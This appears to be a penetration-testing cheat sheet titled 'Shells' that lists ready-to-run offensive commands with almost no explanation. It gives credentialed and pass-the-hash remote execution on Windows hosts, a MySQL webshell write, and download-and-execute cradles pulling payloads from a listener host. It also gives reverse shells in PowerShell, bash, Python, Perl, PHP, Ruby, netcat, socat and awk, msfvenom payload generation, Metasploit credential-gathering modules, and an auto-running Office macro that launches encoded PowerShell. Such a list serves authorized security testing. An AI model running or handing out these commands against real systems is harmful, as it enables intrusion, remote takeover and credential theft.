Skip to content

Shells

Windows Shell

SMB

wmiexec.py <domain>\<user>:<pass>@<target>
winexe -U <domain>/<user>%<pass> //<target> cmd.exe /c dir C:\
pth-winexe -U <user>%<hash> //<target> cmd
impacket-psexec '<user>:<pass>@<target>'
impacket-psexec @targets.txt -u domain\user -p password -s command

crackmapexec smb --exec-method wmiexec <host> -u <user> -d <domain> -H <hash> -x <command>
crackmapexec smb --exec-method smbexec <host_file> -u <user> -d <domain> -H <hash> -x <command>
crackmapexec smb --exec-method atexec <host> -u <user> -d <domain> -H <hash> -x <command>
crackmapexec smb --exec-method mmcexec <host> -u <user> -d <domain> -H <hash> -x <command>

WmiExec.ps1 -ComputerName "<target>" -Command "Get-ChildItem C:\"

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd.exe"'
Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName <target.fqdn>

wmic /node:"<target>" /user:"<domain\user>" /password:"<pass>" process call create "powershell -Sta -Nop -Window Hidden -EncodedCommand <b64_cmd>"

schtasks /create /S <target.fqdn> /SC Weekly /RU <domain\user> /TN <service_name> /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://<listener_ip>/Invoke-PowerShellTcp.ps1''')'" ; schtasks /Run /S <target.fqdn> /TN <service_name>

Copy-Item .\nc.exe \\<target.fqdn>\C$\Users\Public\Downloads
schtasks /create /S <target.fqdn> /SC Weekly /RU <domain\user> /TN <service_name> /TR "C:\Users\Public\Downloads\nc.exe -e cmd <listener_ip> <listener_port>" ; schtasks /Run /S <target.fqdn> /TN <service_name>

WinRM

gem install evil-winrm
evil-winrm -i <target> -u <user> -p '<pass>'

SQL shell

Mysql webshell

SELECT '<?php passthru($_GET[cmd]);?>' INTO OUTFILE '<file_location>/<filename>'

MSSQL reverse shell

# https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1
Invoke-SQLOCmd -Verbose -Command "powershell iex(New-Object Net.WebClient).DownloadString('http://<listener_ip>/Invoke-PowerShellTcp.ps1') -Instance <target.fqdn>

Reverse Shell

Check outgoing ports

Internet

portquiz

local

# Generate and execute on target
msfvenom -p windows/meterpreter/reverse_tcp_allports -f exe > test_firewall.exe

# Listen for incoming traffic
tcpdump -ni any host <target>

CMD

certutil -urlcache -split -f http://<listener_ip>:1234/shell.exe C:\Windows\Temp\shell.exe & start "" C:\Windows\Temp\shell.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U shell.exe

Powershell

# Reflective PE injection
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://<listener_ip>/met.dll');(New-Object System.Net.WebClient).DownloadString('http://<listener_ip>/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";

# Basic download and exec
Invoke-WebRequest -Uri "http://<listener_ip>:1234/nc.exe" -OutFile "nc.exe" & .\nc.exe -e cmd.exe <listener_ip> 1234

echo Invoke-WebRequest -Uri http://<listener_ip>:1234/revshell.exe -Outfile c:\windows\temp\revshell.exe | powershell -noprofile

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://<listener_ip>:1234/shell.ps1')|iex"

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<listener_ip>",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<listener_ip>',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

# Powercat
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

powercat -c <listener_ip> -p 1234 -e cmd.exe

powercat -c <listener_ip> -p 1234 -e cmd.exe -g > reverse.ps1
.\reverse.ps1

powercat -c <listener_ip> -p 1234 -e cmd.exe -ge > reverse

powershell -e ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgA.....

Bash TCP

bash -i >& /dev/tcp/<listener_ip>/1234 0>&1
0<&196;exec 196<>/dev/tcp/<listener_ip>/4242; sh <&196 >&196 2>&196
exec 5<> /dev/tcp/<listener_ip>/4242; cat <&5 | while read line; do $line 2>&5>&5; done 

Bash UDP

Victim:
sh -i >& /dev/udp/<listener_ip>/4242 0>&1

Listener:
nc -u -lvp 4242

Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<listener_ip>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<listener_ip>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

export RHOST="<listener_ip>";export RPORT=1234;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Perl

perl -e 'use Socket;$i="<listener_ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<listener_ip>:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"<listener_ip>:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PHP

php -r '$sock=fsockopen("<listener_ip>",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<listener_ip>",1234);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<listener_ip>",1234);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<listener_ip>",1234);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<listener_ip>",1234);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("<listener_ip>",1234);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("<listener_ip>",1234);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Ruby

ruby -rsocket -e'f=TCPSocket.open("<listener_ip>",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<listener_ip>","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("<listener_ip>","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat

nc -e /bin/sh <listener_ip> 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <listener_ip> 1234 >/tmp/f

Socat

socat -d -d TCP4-LISTEN:1234 STDOUT
socat TCP4:<listener_ip>:1234 EXEC:/bin/bash

socat TCP4-LISTEN:1234,reuseaddr,fork EXEC:/home/leak
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listener_ip>:1234

socat file:`tty`,raw,echo=0 TCP-L:1234
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listener_ip>:1234


wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listener_ip>:1234

Awk

awk 'BEGIN {s = "/inet/tcp/0/<listener_ip>/1234"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

War

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<listener_ip> LPORT=1234 -f war > reverse.war

Get better BASH shell

Using socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:1234

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listener_ip>:1234  

Using stty

python -c 'import pty; pty.spawn("/bin/sh")'
ctrl + z
stty raw -echo;fg
reset

File transfer

Bitsadmin

certutil -encode exe.exe file.txt
bitsadmin /Transfeer jobname http://<listener_ip>/file.txt C:\<path>\file.txt
certutil -decode file.txt exe.exe

Netcat

nc -nlvp 80 > received.txt
nc <ip_adress> 80 < sent.txt 

Socat

Socat nossl

socat TCP4-LISTEN:80,fork file:secret_passwords.txt
socat TCP4:<ip_adress>:80 file:received_secret_passwords.txt,create

Socat SSL

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

socat -OPENSSL:<ip_adress>:443,verify=0

Python HTTP

python -m SimpleHTTPServer 8080
python3 -m http.server 8080

SMB impacket

sudo impacket-smbserver -smb2support share_name /tmp/sharefolder
copy \\<listener_ip>\<share_name>\<file>

Powershell

disable UAC
Set-ExecutionPolicy Unrestricted
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
Invoke-WebRequest -Uri http://<ip_adress>/<file> -Outfile <file>

Powercat

nc -lnvp 1234 > <file>
powercat -c <listener_ip> -p 1234 -i <file>

powercat -l -v -p 443 -t 1000

Metasploit

# Generate shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<listener_ip> LPORT=1234 -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener_ip> LPORT=1234 -f exe > reverse.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<listener_ip> LPORT=1234 -f macho > shell.macho
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener_ip> LPORT=1234 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<listener_ip> LPORT=1234 -f war > shell.war
msfvenom -p php/meterpreter_reverse_tcp LHOST=<listener_ip> LPORT=1234 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

# generate handler 
msfconsole
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
jobs -l 
jobs -K 
set ExitOnSession false
set AUTORUNSCRIPT post/windows/manage/migrate
run -j 
makerc /tmp/msf.rc
msfconsole -r /tmp/msf.rc

# Download and execute on target
wget <listener_ip>:1234/shell.elf -O /tmp/shell.elf && chmod 777 /tmp/shell.elf && /tmp/shell.elf &

# Upload, hide and exec from meterpreter
execute -H -i -c -m -d calc.exe -f /tmp/exploit.exe -a '-arg1 -arg2 -arg3'

# Multi post modules 
echo "post/windows/gather/credentials/sso" >> /tmp/multi_post.rc
echo "post/windows/gather/credentials/gpp" >> /tmp/multi_post.rc
use post/multi/manage/multi_post
set MACRO=/tmp/macro.rc
set SESSION 1
run -j

Office Macro

# generate using metasploit
msfvenom -p windows/shell_reverse_tcp LHOST="<listener_ip>" LPORT=443 -f hta-psh > revshell.hta

# python split macro
str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range(0, len(str), n):
 print "Str = Str + " + '"' + str[i:i+n] + '"'


# macro 
Sub AutoOpen()
 juan
End Sub

Sub Document_Open()
 juan

End Sub
Sub juan()
 Dim Str As String
 Str = Str + "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZ"
 Str = Str + "QByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA"
 Str = Str + "AAvAE0AVABpAFIAVABEACcAKQApADsA"

 CreateObject("Wscript.Shell").Run Str
End Sub

Web proxies

  • Use an allowed domain such as cloudfront.net, wordpress.net, azurewebsites.net, etc.
  • check user-agent